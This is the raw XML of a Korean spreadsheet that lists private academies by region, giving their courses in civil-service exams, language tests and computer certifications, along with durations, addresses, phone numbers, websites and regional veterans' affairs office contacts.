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9225" activeTab="0"/>
  </bookViews>
  <sheets>
    <sheet name="오프라인" sheetId="1" r:id="rId1"/>
    <sheet name="온라인" sheetId="2" r:id="rId2"/>
    <sheet name="--------" sheetId="3" state="veryHidden" r:id="rId3"/>
  </sheets>
  <definedNames/>
  <calcPr fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1820" uniqueCount="1334">
  <si>
    <t>인천 남구 주안동 130-5, 덕진빌딩 3층</t>
  </si>
  <si>
    <t>032-875-3331
(032-875-3332)</t>
  </si>
  <si>
    <t>7,9급공무원,경찰</t>
  </si>
  <si>
    <t>032-277-0055,0112
(032-288-0033)</t>
  </si>
  <si>
    <t>연희컴퓨터학원</t>
  </si>
  <si>
    <t>워드1급,컴활1,2급,정보처리
기능,사무자동화산업기사</t>
  </si>
  <si>
    <t>인천 서구 심곡동 303-1 새터빌딩 4층</t>
  </si>
  <si>
    <t>032-562-4886
(0505-562-4886)</t>
  </si>
  <si>
    <t>인타학원</t>
  </si>
  <si>
    <t>워드,엑셀</t>
  </si>
  <si>
    <t>1개월</t>
  </si>
  <si>
    <t>인천 중구 인현동 22-6 인하빌딩 3~6층</t>
  </si>
  <si>
    <t>032-772-9457
(032-777-4129)</t>
  </si>
  <si>
    <t>시대컴퓨터학원</t>
  </si>
  <si>
    <t>워드,컴활,사무자동화,정보처리</t>
  </si>
  <si>
    <t>인천 남동구 구월동 1225-36</t>
  </si>
  <si>
    <t>032-427-7494
(032-466-7494)</t>
  </si>
  <si>
    <t>우리컴퓨터학원</t>
  </si>
  <si>
    <t>워드,컴활,정보처리기사
/산업기사,사무자동화산업기사</t>
  </si>
  <si>
    <t>1~2개월</t>
  </si>
  <si>
    <t>부천시 원미구 심곡동 87-11</t>
  </si>
  <si>
    <t>032-665-5522
(032-668-6754)</t>
  </si>
  <si>
    <t>파레스컴퓨터아트학원</t>
  </si>
  <si>
    <t>컴퓨터활용능력1급</t>
  </si>
  <si>
    <t>032-501-1300
(032-501-1330)</t>
  </si>
  <si>
    <t>고려IT컴퓨터아트학원</t>
  </si>
  <si>
    <t>컴활1급, 워드
사무자동화산업기사
정보처리기사/산업기사</t>
  </si>
  <si>
    <t>이론1개월,
실기1개월</t>
  </si>
  <si>
    <t>032-325-6636
(0505-361-9413)</t>
  </si>
  <si>
    <t>그린컴퓨터아트학원</t>
  </si>
  <si>
    <t>컴활1,2급,정보처리,사무자동화</t>
  </si>
  <si>
    <t>032-330-2111
(032-515-5511)</t>
  </si>
  <si>
    <t>주안글로벌어학원</t>
  </si>
  <si>
    <t>토익, JLPT, HSK</t>
  </si>
  <si>
    <t>인천 남구 주안동 133-3 대동빌딩 8층</t>
  </si>
  <si>
    <t>032-868-6969
(032-424-7260)</t>
  </si>
  <si>
    <t>파고다외국어학원</t>
  </si>
  <si>
    <t>영어(토익,토플,TEPS),
일본어(JPT,JLPT)</t>
  </si>
  <si>
    <t>인천시 부평구 부평동 549-36, 2층</t>
  </si>
  <si>
    <t>032-526-4000
(032-526-4032)</t>
  </si>
  <si>
    <t>아카데미외국어학원</t>
  </si>
  <si>
    <t>1~8개월</t>
  </si>
  <si>
    <t>부천시 원미구 심곡2동 190-10</t>
  </si>
  <si>
    <t>032-663-2227
(032-232-0515)</t>
  </si>
  <si>
    <t>민병철어학원(부천)</t>
  </si>
  <si>
    <t>토익</t>
  </si>
  <si>
    <t>부천시 원미구 심곡2동 164-4. 3층</t>
  </si>
  <si>
    <t>032-613-0579
(032-613-2474)</t>
  </si>
  <si>
    <t>민병철어학원(인천)</t>
  </si>
  <si>
    <t>영어(토익,토플),
중국어(HSK),일본어(JLPT)</t>
  </si>
  <si>
    <t>인천시 남구 주안동 136-1 경향빌딩 13층</t>
  </si>
  <si>
    <t>032-431-6622
(032-431-5205)</t>
  </si>
  <si>
    <t>㈜월비스공무원 경찰학원</t>
  </si>
  <si>
    <t>1~3개월</t>
  </si>
  <si>
    <t>인천시 부평구 부평동 194-4 
대신스카이프라자빌딩 9층</t>
  </si>
  <si>
    <t>1544-1661
(032-508-0330)</t>
  </si>
  <si>
    <t>춘천보훈지청
(☎033-258-3610)
(fax 033-244-5104)</t>
  </si>
  <si>
    <t>춘천서울고시학원</t>
  </si>
  <si>
    <t>9급공무원</t>
  </si>
  <si>
    <t>강원도 춘천시 효자3동 643-7
(www.seoulgosi.net)</t>
  </si>
  <si>
    <t>033-255-3555</t>
  </si>
  <si>
    <t>경찰공무원</t>
  </si>
  <si>
    <t>원주새롬행정고시학원</t>
  </si>
  <si>
    <t>강원도 원주시 개운동 277-17 개운빌딩 6층
(www.seoulgosi.net)</t>
  </si>
  <si>
    <t>033-744-7274</t>
  </si>
  <si>
    <t>남승화
직업전문학교</t>
  </si>
  <si>
    <t>워드, 컴활(필기, 실기)</t>
  </si>
  <si>
    <t>강원도 원주시 개운동 382-20
(www.nsh.co.kr)</t>
  </si>
  <si>
    <t>033-763-5959</t>
  </si>
  <si>
    <t>정보처리기능사/산업기사</t>
  </si>
  <si>
    <t>정보기기운용기능사, 사무자동화산업기사</t>
  </si>
  <si>
    <t>춘천컴퓨터학원</t>
  </si>
  <si>
    <t>필기(1개월)
실기(2개월)</t>
  </si>
  <si>
    <t>강원도 효자동 250-76
(www.joball.kr)</t>
  </si>
  <si>
    <t>033-263-9979</t>
  </si>
  <si>
    <t>정보처리기사/사무자동화산업기사</t>
  </si>
  <si>
    <t>씨앗컴퓨터학원</t>
  </si>
  <si>
    <t>워드, 컴활(필기)</t>
  </si>
  <si>
    <t>강원도 춘천시 후평3동 동아빌딩3층
(www.seeds.co.kr)</t>
  </si>
  <si>
    <t>033-252-0179</t>
  </si>
  <si>
    <t>워드, 컴활(실기)</t>
  </si>
  <si>
    <t>정보처리기사산업기사, 사무자동화산업기사</t>
  </si>
  <si>
    <t>중앙정보처리학원</t>
  </si>
  <si>
    <t>필기(2개월)
실기(1개월)</t>
  </si>
  <si>
    <t>강원도 홍천군 홍천읍 희망3리 324-37번지
(www.e-joongang.co.kr)</t>
  </si>
  <si>
    <t>033-433-1926</t>
  </si>
  <si>
    <t>정보처리기사/산업기사</t>
  </si>
  <si>
    <t>사무자동화산업기사</t>
  </si>
  <si>
    <t>실기(2개월)</t>
  </si>
  <si>
    <t>이지토익학원</t>
  </si>
  <si>
    <t>강원도 춘천시 효자3동 20-4</t>
  </si>
  <si>
    <t>033-243-9466</t>
  </si>
  <si>
    <t>연세 ELP 학원</t>
  </si>
  <si>
    <t>2~4개월</t>
  </si>
  <si>
    <t>강원도 원주시 개운동 434-15
(www.yselp.com)</t>
  </si>
  <si>
    <t>033-765-2141</t>
  </si>
  <si>
    <t>권정미 컴퓨터학원</t>
  </si>
  <si>
    <t>워드,컴활(필기,실시)</t>
  </si>
  <si>
    <t>춘천시 후평동 891-2</t>
  </si>
  <si>
    <t>033-261-1477</t>
  </si>
  <si>
    <t>서울고시학원</t>
  </si>
  <si>
    <t>9급공무원, 경찰, 소방직 공무원</t>
  </si>
  <si>
    <t>강릉시 교동 860-25(제일고 사거리)</t>
  </si>
  <si>
    <t>033647-2600
fax)655-0003</t>
  </si>
  <si>
    <t>영동고시학원</t>
  </si>
  <si>
    <t>9급공무원, 경찰공무원</t>
  </si>
  <si>
    <t>1~2개월</t>
  </si>
  <si>
    <t>강릉시 임당동 88-11 김씨대종회2층</t>
  </si>
  <si>
    <t>033-646-5611
fax)646-5611</t>
  </si>
  <si>
    <t>한국컴퓨터학원</t>
  </si>
  <si>
    <t>정보화자격증</t>
  </si>
  <si>
    <t>1개월</t>
  </si>
  <si>
    <t>강릉시  포남동 1171-8</t>
  </si>
  <si>
    <t>(033)651-4641
메일
kim6454640@hanmail.net</t>
  </si>
  <si>
    <t>강원컴퓨터학원</t>
  </si>
  <si>
    <t>동해시 천곡동 962-21</t>
  </si>
  <si>
    <t>033-532-3399
메일: kw3399@hanmail.net</t>
  </si>
  <si>
    <t>하은전산학원</t>
  </si>
  <si>
    <t>삼척시 남양동 33-13</t>
  </si>
  <si>
    <t>033-574-3177
fax)574-3177</t>
  </si>
  <si>
    <t>현대컴퓨터학원</t>
  </si>
  <si>
    <t>태백시 황지동 244-34 우경빌딩 1층</t>
  </si>
  <si>
    <t>033-553-5404
fax)553-7611</t>
  </si>
  <si>
    <t>골든벨컴퓨터전산학원</t>
  </si>
  <si>
    <t>강원도 동해시 효가동 237번지 성림빌딩 4층</t>
  </si>
  <si>
    <t>033-521-5842
cometrue74@naver.com</t>
  </si>
  <si>
    <t>한국경찰학원</t>
  </si>
  <si>
    <t>일반경찰 기본반</t>
  </si>
  <si>
    <t>부산시 부산진구 부전2동 220-12
(http://busan.koreapolice.co.kr)</t>
  </si>
  <si>
    <t>051-804-9112</t>
  </si>
  <si>
    <t>일반경찰 집중반</t>
  </si>
  <si>
    <t>2개월</t>
  </si>
  <si>
    <t>해양경찰 공채반</t>
  </si>
  <si>
    <t>3개월</t>
  </si>
  <si>
    <t>해양경찰 특채반</t>
  </si>
  <si>
    <t>9주과정</t>
  </si>
  <si>
    <t>공무원종합반</t>
  </si>
  <si>
    <t>교원임용(단과)</t>
  </si>
  <si>
    <t>1개월</t>
  </si>
  <si>
    <t>JBS경찰학원</t>
  </si>
  <si>
    <t>경찰직종합반,단과반</t>
  </si>
  <si>
    <t>2~3개월</t>
  </si>
  <si>
    <t>051-816-6112</t>
  </si>
  <si>
    <t>부산수도고시학원</t>
  </si>
  <si>
    <t>군무원(국어,국사,영어,전공2과목)</t>
  </si>
  <si>
    <t>051-808-6114</t>
  </si>
  <si>
    <t>6개월</t>
  </si>
  <si>
    <t>고려고시학원</t>
  </si>
  <si>
    <t>9급</t>
  </si>
  <si>
    <t>051-818-8481</t>
  </si>
  <si>
    <t>정보처리기사(필기+실기)</t>
  </si>
  <si>
    <t>합격시까지</t>
  </si>
  <si>
    <t>정보처리기사(실기)</t>
  </si>
  <si>
    <t>부산고시학원</t>
  </si>
  <si>
    <t>9급</t>
  </si>
  <si>
    <t>051-819-8001</t>
  </si>
  <si>
    <t>7급</t>
  </si>
  <si>
    <t>경찰직</t>
  </si>
  <si>
    <t>소방직</t>
  </si>
  <si>
    <t>교원임용</t>
  </si>
  <si>
    <t>한겨레고시학원</t>
  </si>
  <si>
    <t>9급, 7급</t>
  </si>
  <si>
    <t>051-808-2325</t>
  </si>
  <si>
    <t>경찰직종합반</t>
  </si>
  <si>
    <t>더조은컴퓨터
아트학원</t>
  </si>
  <si>
    <t>워드프로세서1급,2급,3급</t>
  </si>
  <si>
    <t>051-817-1650</t>
  </si>
  <si>
    <t>정보처리(산업)기사</t>
  </si>
  <si>
    <t>그린컴퓨터
아트학원</t>
  </si>
  <si>
    <t>사무자동화산업기사</t>
  </si>
  <si>
    <t>1개월</t>
  </si>
  <si>
    <t>051-912-1000</t>
  </si>
  <si>
    <t>컴퓨터활용능력1급(Excel)</t>
  </si>
  <si>
    <t>이그잼고시</t>
  </si>
  <si>
    <t>7,9급 공무원</t>
  </si>
  <si>
    <t>부산광역시 금정구 장전동 40번지 부산대 효원굿플러스 6층</t>
  </si>
  <si>
    <t>051-590-8383</t>
  </si>
  <si>
    <t>컴퓨터활용능력1급(Access)</t>
  </si>
  <si>
    <t>컴퓨터활용능력2급(Excel)</t>
  </si>
  <si>
    <t>ESS외국어학원</t>
  </si>
  <si>
    <t>토익</t>
  </si>
  <si>
    <t>051-257-3355</t>
  </si>
  <si>
    <t>㈜와이비엠에듀케이션 
대연센터</t>
  </si>
  <si>
    <t>TOEIC 입문,시작,기본,중급</t>
  </si>
  <si>
    <t>각2개월</t>
  </si>
  <si>
    <t>051-917-0509</t>
  </si>
  <si>
    <t>토익실전</t>
  </si>
  <si>
    <t>2개월</t>
  </si>
  <si>
    <t>TOEIC Speaking 입문실전</t>
  </si>
  <si>
    <t>토익초급</t>
  </si>
  <si>
    <t>TOEIC Speaking 중급</t>
  </si>
  <si>
    <t>주말 TOEIC 입문,기본</t>
  </si>
  <si>
    <t>일본어(JPT,JLPT과정)</t>
  </si>
  <si>
    <t>㈜와이비엠러닝시스템즈 
부산이엘에스</t>
  </si>
  <si>
    <t>토마토 토익 베이직</t>
  </si>
  <si>
    <t>051-464-0509</t>
  </si>
  <si>
    <t>해커스토익,스타트,중급</t>
  </si>
  <si>
    <t>명품실전토익</t>
  </si>
  <si>
    <t>IBT토플과정</t>
  </si>
  <si>
    <t>7주 완성</t>
  </si>
  <si>
    <t>토익스피킹전과정(왕기초,초,중,실전반)</t>
  </si>
  <si>
    <t>일본어능력시험대비반(N1,N2,N3)</t>
  </si>
  <si>
    <t>JPT시험대비반(초급,중급)</t>
  </si>
  <si>
    <t>HSK중국어시험대비반(4급,5급)</t>
  </si>
  <si>
    <t>㈜와이비엠러닝시스템즈 
와이비엠어학원</t>
  </si>
  <si>
    <t>각1개월</t>
  </si>
  <si>
    <t>051-809-0509</t>
  </si>
  <si>
    <t>토플</t>
  </si>
  <si>
    <t>TOEIC Speaking</t>
  </si>
  <si>
    <t>일본어(JPT,JLPT과정)</t>
  </si>
  <si>
    <t>HSK중국어시험대비반</t>
  </si>
  <si>
    <t>제주특별자치도
보      훈     청
(☎064-710-8407)
(fax064-710-8409)</t>
  </si>
  <si>
    <t>법률행정고시학원</t>
  </si>
  <si>
    <t>공무원,교사임용 시험</t>
  </si>
  <si>
    <t>제주시 이도2동 1176-29</t>
  </si>
  <si>
    <t>064-725-0933</t>
  </si>
  <si>
    <t>한솔고시학원</t>
  </si>
  <si>
    <t>제주시 이도2동 1034-4성우빌딩401</t>
  </si>
  <si>
    <t>064-722-5528</t>
  </si>
  <si>
    <t>제주통역어학원</t>
  </si>
  <si>
    <t>토익시험</t>
  </si>
  <si>
    <t>제주시 연동 260-21 3층</t>
  </si>
  <si>
    <t>064-747-6969</t>
  </si>
  <si>
    <t>썬어학원</t>
  </si>
  <si>
    <t>제주시 이도2동 1080-6</t>
  </si>
  <si>
    <t>064-755-8123</t>
  </si>
  <si>
    <t>JES제일학원</t>
  </si>
  <si>
    <t>제주시 이도1동 1787-10</t>
  </si>
  <si>
    <t>064-758-1115</t>
  </si>
  <si>
    <t>탐라컴퓨터학원</t>
  </si>
  <si>
    <t>정보화자격증 대비</t>
  </si>
  <si>
    <t>1-5개월</t>
  </si>
  <si>
    <t>제주시 연동 2328-1</t>
  </si>
  <si>
    <t>064-748-0912</t>
  </si>
  <si>
    <t>클릭컴퓨터학원</t>
  </si>
  <si>
    <t>064-753-1142</t>
  </si>
  <si>
    <t>중앙컴퓨터학원</t>
  </si>
  <si>
    <t>서귀포시 서귀동 299-4</t>
  </si>
  <si>
    <t>064-762-0377</t>
  </si>
  <si>
    <t>제일외국어통역학원</t>
  </si>
  <si>
    <t>일본어(JPT),토익</t>
  </si>
  <si>
    <t>제주시 이도1동 1789-3  3F</t>
  </si>
  <si>
    <t>064-758-5440</t>
  </si>
  <si>
    <r>
      <t>울산보훈지청
(☎052-228-6522)
(fax052-275-8002)</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="돋움"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>창원보훈지청
(☎055-240-0115)
(fax055-247-5153)</t>
  </si>
  <si>
    <t>진주보훈지청
(☎055-760-2831)
(fax055-757-3881)</t>
  </si>
  <si>
    <t>대전지방보훈청
(☎042-280-1138)
(fax042-256-9683)</t>
  </si>
  <si>
    <t>홍성보훈지청
(☎041-630-3750)
(fax041-634-3972)</t>
  </si>
  <si>
    <t>청주보훈지청
(☎043-299-6226)
(fax043-285-3220)</t>
  </si>
  <si>
    <t>충주보훈지청
(☎043-841-8809)
(fax043-845-0476)</t>
  </si>
  <si>
    <t>대구지방보훈청
(☎053-659-6093)
(fax053-659-6095)</t>
  </si>
  <si>
    <t>서울 중구 신당동 193-27 무궁화회관 4,5층</t>
  </si>
  <si>
    <t>서울 마포구 노고산동 107-1 동인빌딩 6층</t>
  </si>
  <si>
    <t>1644-0479</t>
  </si>
  <si>
    <t>박정어학원(신촌)</t>
  </si>
  <si>
    <t>토익, 토플, 텝스</t>
  </si>
  <si>
    <t>1개월</t>
  </si>
  <si>
    <t>02-325-0505</t>
  </si>
  <si>
    <t>인천 부평구 부평동 185-8 그랑프리빌딩 8층</t>
  </si>
  <si>
    <t>인천시 부평구 부평동 549-43 서울빌딩 1,2층</t>
  </si>
  <si>
    <t>부천시 원미구 중1동 1161-3번지 일신빌딩 7층</t>
  </si>
  <si>
    <t>인천부평구 부평동 549-6 신도시프라자 9층</t>
  </si>
  <si>
    <t>부산시 진구 부전2동 224-22</t>
  </si>
  <si>
    <t>부산시 진구 전포동 223-8 구슬빌딩 7층
(http://www.sudogosi.net)</t>
  </si>
  <si>
    <t>부산광역시 부산진구 부전동 690-5 
(http://www.gosikorea.co.kr)</t>
  </si>
  <si>
    <t>부산광역시 부산진구 부전2동 225-3 
(http://www.busangosi.net/main.htm)</t>
  </si>
  <si>
    <t>부산광역시 부산진구 전포1동 692-4
흥국생명빌딩
(http://camp.gosiguide.co.kr)</t>
  </si>
  <si>
    <t>부산광역시 부산진구 
부전동 192-2 쥬디스태화 5층
(http://bs.tjoeun.co.kr)</t>
  </si>
  <si>
    <t>부산광역시 부산진구 
부전동232-31, 한성빌딩 1층, 2층, 9층
(http://www.greenart.co.kr)</t>
  </si>
  <si>
    <t>부산광역시 중구 광복동 1가 38-1
(http://www.ess.co.kr)</t>
  </si>
  <si>
    <t>부산광역시 남구 대연동 73-11 
서전텔콤2층
(http://daeyun.ybmedu.com)</t>
  </si>
  <si>
    <t>부산광역시 중구 광복동 1가 35-1
(http://elspusan.ybmedu.com)</t>
  </si>
  <si>
    <t>부산광역시 부산진구 부전동 255-26
YBM빌딩 1~8층
(http://elspusan.ybmedu.com)</t>
  </si>
  <si>
    <t>박문각 행정고시학원</t>
  </si>
  <si>
    <t>9급 공무원</t>
  </si>
  <si>
    <t>경기 의정부시 의정부1동 173-10
(http://www.ujbgosi.com)</t>
  </si>
  <si>
    <t>031-845-7494
(031-845-7464)</t>
  </si>
  <si>
    <t>월드학원</t>
  </si>
  <si>
    <t>워드, 컴활, 정보처리기사/산업기사, 사무자동화산업기사</t>
  </si>
  <si>
    <t>경기 고양시 덕양구 성사동 699-112
(http://teti.ssam.biz)</t>
  </si>
  <si>
    <t>031-963-8038
(031-967-8039)</t>
  </si>
  <si>
    <t>중산학원</t>
  </si>
  <si>
    <t>경기 고양시 일산동구 중산동 1562 솔샘프라자 7층</t>
  </si>
  <si>
    <t>031-977-6674
(031-976-6660)</t>
  </si>
  <si>
    <t>문종컴퓨터스쿨</t>
  </si>
  <si>
    <t>워드, 컴활(1,2,3급), 정보처리기사/산업기사</t>
  </si>
  <si>
    <t>경기 고양시 일산서구 일산동 655-15 일산역이안 302호
(http://www.moonjong.com)</t>
  </si>
  <si>
    <t>031-977-8196
(031-977-3059)</t>
  </si>
  <si>
    <t>사무자동화산업기사, 정보기기운용기능사</t>
  </si>
  <si>
    <t>공간컴퓨터정예학원</t>
  </si>
  <si>
    <t>워드, 컴활</t>
  </si>
  <si>
    <t>경기 고양시 일산서구 주엽2동 136 대우레시티 236호
(http://www.kongkanart.com)</t>
  </si>
  <si>
    <t>031-921-9090</t>
  </si>
  <si>
    <t>그린컴퓨터학원</t>
  </si>
  <si>
    <t>워드, 컴활, 정보처리기사/산업기사</t>
  </si>
  <si>
    <t>경기 파주시 조리읍 봉일천리 205-17 3층</t>
  </si>
  <si>
    <t>031-946-4748
(031-943-4741)</t>
  </si>
  <si>
    <t>대한컴퓨터학원</t>
  </si>
  <si>
    <t>워드, 컴활 1,2,3급</t>
  </si>
  <si>
    <t>JOB.xls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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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02-747-2992</t>
  </si>
  <si>
    <t>에듀피디</t>
  </si>
  <si>
    <t>공무원종합</t>
  </si>
  <si>
    <t>www.edupd.com</t>
  </si>
  <si>
    <t>02-747-5775</t>
  </si>
  <si>
    <t>에듀피디10</t>
  </si>
  <si>
    <t>기능직공무원</t>
  </si>
  <si>
    <t>www.10.edupd.com</t>
  </si>
  <si>
    <t>02-747-2033</t>
  </si>
  <si>
    <t xml:space="preserve">경기 양주시 덕정동 2-7 황금프라자 603 </t>
  </si>
  <si>
    <t>031-858-8531</t>
  </si>
  <si>
    <t>정보처리기사/산업기사, 사무자동화산업기사</t>
  </si>
  <si>
    <t>정보기기운용기능사</t>
  </si>
  <si>
    <t>더조은컴퓨터학원</t>
  </si>
  <si>
    <t>컴퓨터활용능력1~2급(실기),사무자동화(실기)</t>
  </si>
  <si>
    <t>경기 의정부시 의정부동 194-8 천재빌딩 4~5층
(http://uj.tjoeun.co.kr)</t>
  </si>
  <si>
    <t>031-846-5888
(031-846-6198)</t>
  </si>
  <si>
    <t>정보처리산업기사/기능사,정보처리기사</t>
  </si>
  <si>
    <t>시사 iLS영어학원</t>
  </si>
  <si>
    <t>토익</t>
  </si>
  <si>
    <t>경기 의정부시 의정부동 442-12 광장타워 6층</t>
  </si>
  <si>
    <t>031-873-0581</t>
  </si>
  <si>
    <t>의정부종로외국어학원</t>
  </si>
  <si>
    <t>경기 의정부시 의정부3동 132-31 명보빌딩 3층
(http://koreaflec.com)</t>
  </si>
  <si>
    <t>031-871-6602</t>
  </si>
  <si>
    <t>원월드외국어학원</t>
  </si>
  <si>
    <t>토익, 토플, HSK, JPT, JLPT</t>
  </si>
  <si>
    <t>경기 의정부시 의정부3동 94-1 혜원빌딩 4,5층
(http://www.abc119.co.kr)</t>
  </si>
  <si>
    <t>031-855-8747</t>
  </si>
  <si>
    <t>의정부보훈지청
(☎032-820-0422)
(fax032-840-3321)</t>
  </si>
  <si>
    <t>홈페이지 주소</t>
  </si>
  <si>
    <t>2~3개월</t>
  </si>
  <si>
    <t>강의마을</t>
  </si>
  <si>
    <t>교육학기본이론/임용국어, 수학, 물리, 과학, 미술</t>
  </si>
  <si>
    <t>2개월</t>
  </si>
  <si>
    <t>www.lecturetown.kr</t>
  </si>
  <si>
    <t>02-2681-3661</t>
  </si>
  <si>
    <t>고시스쿨</t>
  </si>
  <si>
    <t>9급공무원(행정, 경찰, 소방), 군무원, 기능직공무원,
중국어(HSK), 일본어(JPT), 정보화자격증</t>
  </si>
  <si>
    <t>2~3개월</t>
  </si>
  <si>
    <t>www.gosischool.com</t>
  </si>
  <si>
    <t>02-831-8009</t>
  </si>
  <si>
    <t>코리안에듀</t>
  </si>
  <si>
    <t>교원임용</t>
  </si>
  <si>
    <t>www.koreanedu.net</t>
  </si>
  <si>
    <t>02-823-5252</t>
  </si>
  <si>
    <t>두빛나래</t>
  </si>
  <si>
    <t>7,9급 공무원</t>
  </si>
  <si>
    <t>1~3개월</t>
  </si>
  <si>
    <t>www.dubitn.com</t>
  </si>
  <si>
    <t>070-8830-7772</t>
  </si>
  <si>
    <t>고시넷</t>
  </si>
  <si>
    <t>7,9급 공무원, 기능직 공무원</t>
  </si>
  <si>
    <t>2~3개월</t>
  </si>
  <si>
    <t>www.gosinet.co.kr</t>
  </si>
  <si>
    <t>02-711-8364</t>
  </si>
  <si>
    <t>김기남방송통신
전기전산학원</t>
  </si>
  <si>
    <t>전기직7,9급 전송기술직7,9급 통신기술직9급</t>
  </si>
  <si>
    <t>www.ginam.co.kr</t>
  </si>
  <si>
    <t>02-836-3543~5</t>
  </si>
  <si>
    <t>수도전기전자통신
정보처리학원</t>
  </si>
  <si>
    <t>7급 전기직, 방송기술직, 통신직</t>
  </si>
  <si>
    <t>www.esudo.co.kr</t>
  </si>
  <si>
    <t>02-2676-0555</t>
  </si>
  <si>
    <t>9급 전기직, 방송기술직, 통신직</t>
  </si>
  <si>
    <t>10급 공무원</t>
  </si>
  <si>
    <t>정보처리, 컴퓨터활용능력, 사무자동화</t>
  </si>
  <si>
    <t>8주</t>
  </si>
  <si>
    <t>조이캠퍼스</t>
  </si>
  <si>
    <t>7,9,10급 공무원(국정원) 등</t>
  </si>
  <si>
    <t>www.joycampus.co.kr</t>
  </si>
  <si>
    <t>1644-0479</t>
  </si>
  <si>
    <t>㈜챔프스터디</t>
  </si>
  <si>
    <r>
      <t>토익, 텝스,토플</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color indexed="8"/>
        <rFont val="돋움"/>
        <family val="3"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="돋움"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> JPT</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">www.champstudy.com </t>
  </si>
  <si>
    <t>02-537-0707</t>
  </si>
  <si>
    <t>㈜웅진패스원</t>
  </si>
  <si>
    <t>공무원과정</t>
  </si>
  <si>
    <t>www.pass-1.co.kr</t>
  </si>
  <si>
    <t>02-870-8503</t>
  </si>
  <si>
    <t>㈜웅진패스원
굿샘</t>
  </si>
  <si>
    <t>임용고시과정</t>
  </si>
  <si>
    <t>www.goodssam.co.kr</t>
  </si>
  <si>
    <t>02-814-9011</t>
  </si>
  <si>
    <t>쌤플러스
(희소고시)</t>
  </si>
  <si>
    <t>www.ssamplus.com</t>
  </si>
  <si>
    <t>02-2135-2137</t>
  </si>
  <si>
    <t>합격의법학원(에듀멘토)</t>
  </si>
  <si>
    <t>공무원, 토익,텝스,정보화과정</t>
  </si>
  <si>
    <t>www.edumentor.co.kr</t>
  </si>
  <si>
    <t>02-876-3458</t>
  </si>
  <si>
    <t>이익훈인터넷어학원</t>
  </si>
  <si>
    <t>토익, 텝스</t>
  </si>
  <si>
    <t>http://edu.ike.co.kr</t>
  </si>
  <si>
    <t>02-3471-2761</t>
  </si>
  <si>
    <t>고시로</t>
  </si>
  <si>
    <t>www.gosiro.co.kr</t>
  </si>
  <si>
    <t>02-813-2115</t>
  </si>
  <si>
    <t>열린보훈가족E취업강좌
(에듀스파㈜)</t>
  </si>
  <si>
    <t>7,9급공무원, 소방공무원, 경찰공무원, 기능직공무원, 임용고시, 토익, 자격증 등</t>
  </si>
  <si>
    <t>기본2개월
(복습기간별도)</t>
  </si>
  <si>
    <t>http://mpva2010.eduspa.com</t>
  </si>
  <si>
    <t>02-3489-9516</t>
  </si>
  <si>
    <t>지스쿨</t>
  </si>
  <si>
    <t>www.g-school.co.kr</t>
  </si>
  <si>
    <t>02-823-5252</t>
  </si>
  <si>
    <t>㈜이그잼</t>
  </si>
  <si>
    <t>공무원,정보화,어학,임용고시과정</t>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color indexed="8"/>
        <rFont val="돋움"/>
        <family val="3"/>
      </rPr>
      <t>~3개월</t>
    </r>
  </si>
  <si>
    <t>www.exam.co.kr</t>
  </si>
  <si>
    <t>02-582-0111</t>
  </si>
  <si>
    <t>카스파</t>
  </si>
  <si>
    <t>9급, 7급 공무원과정(행정학)</t>
  </si>
  <si>
    <t>www.kaspa.co.kr</t>
  </si>
  <si>
    <t>02-532-5280~1</t>
  </si>
  <si>
    <t>에듀메카</t>
  </si>
  <si>
    <t>임용고시</t>
  </si>
  <si>
    <t>www.teachermeca.co.kr</t>
  </si>
  <si>
    <t>02-817-0980</t>
  </si>
  <si>
    <t>데카르트고시학원</t>
  </si>
  <si>
    <t>7급,9급,정보화과정</t>
  </si>
  <si>
    <t>2개월과정</t>
  </si>
  <si>
    <t>www.techart.or.kr</t>
  </si>
  <si>
    <t>02-6080-1725</t>
  </si>
  <si>
    <t>서울남부보훈지청
(☎02-3019-2324)
(fax 02-3019-2333)</t>
  </si>
  <si>
    <t>마이쌤</t>
  </si>
  <si>
    <t>교육학 종합반</t>
  </si>
  <si>
    <t>4개월</t>
  </si>
  <si>
    <t>www.myssam.co.kr</t>
  </si>
  <si>
    <t>02-379-1110
(02-379-0163)</t>
  </si>
  <si>
    <t>에듀피디코리아</t>
  </si>
  <si>
    <t>www.edupdkorea.com</t>
  </si>
  <si>
    <t>킴아카</t>
  </si>
  <si>
    <t>kimaca.co.kr</t>
  </si>
  <si>
    <t>02-937-3981
(02-937-3981)</t>
  </si>
  <si>
    <t>두목넷(광컴퓨터학원)</t>
  </si>
  <si>
    <t>정보처리기사필기</t>
  </si>
  <si>
    <t>35시간</t>
  </si>
  <si>
    <t>www.dumok.net</t>
  </si>
  <si>
    <t>1544-3853</t>
  </si>
  <si>
    <t>정보처리기사필기500제</t>
  </si>
  <si>
    <t>25시간</t>
  </si>
  <si>
    <t>정보처리기사실기</t>
  </si>
  <si>
    <t>30시간</t>
  </si>
  <si>
    <t>정보처리산업기사필기</t>
  </si>
  <si>
    <t>정보처리산업기사필기500제</t>
  </si>
  <si>
    <t>정보처리기능사실기</t>
  </si>
  <si>
    <t>15시간</t>
  </si>
  <si>
    <t>정보기기운용기능사실기</t>
  </si>
  <si>
    <t>10시간</t>
  </si>
  <si>
    <t>사무자동화산업기사실기</t>
  </si>
  <si>
    <t>워드프로세서1급필기</t>
  </si>
  <si>
    <t>워드프로세서1급실기</t>
  </si>
  <si>
    <t>워드프로세서2급필기</t>
  </si>
  <si>
    <t>워드프로세서2급실기</t>
  </si>
  <si>
    <t>컴퓨터활용능력1급실기</t>
  </si>
  <si>
    <t>20시간</t>
  </si>
  <si>
    <t>컴퓨터활용틍력2급실기</t>
  </si>
  <si>
    <t>춘천보훈지청
(☎033-258-3610)
(fax 033-244-5104)</t>
  </si>
  <si>
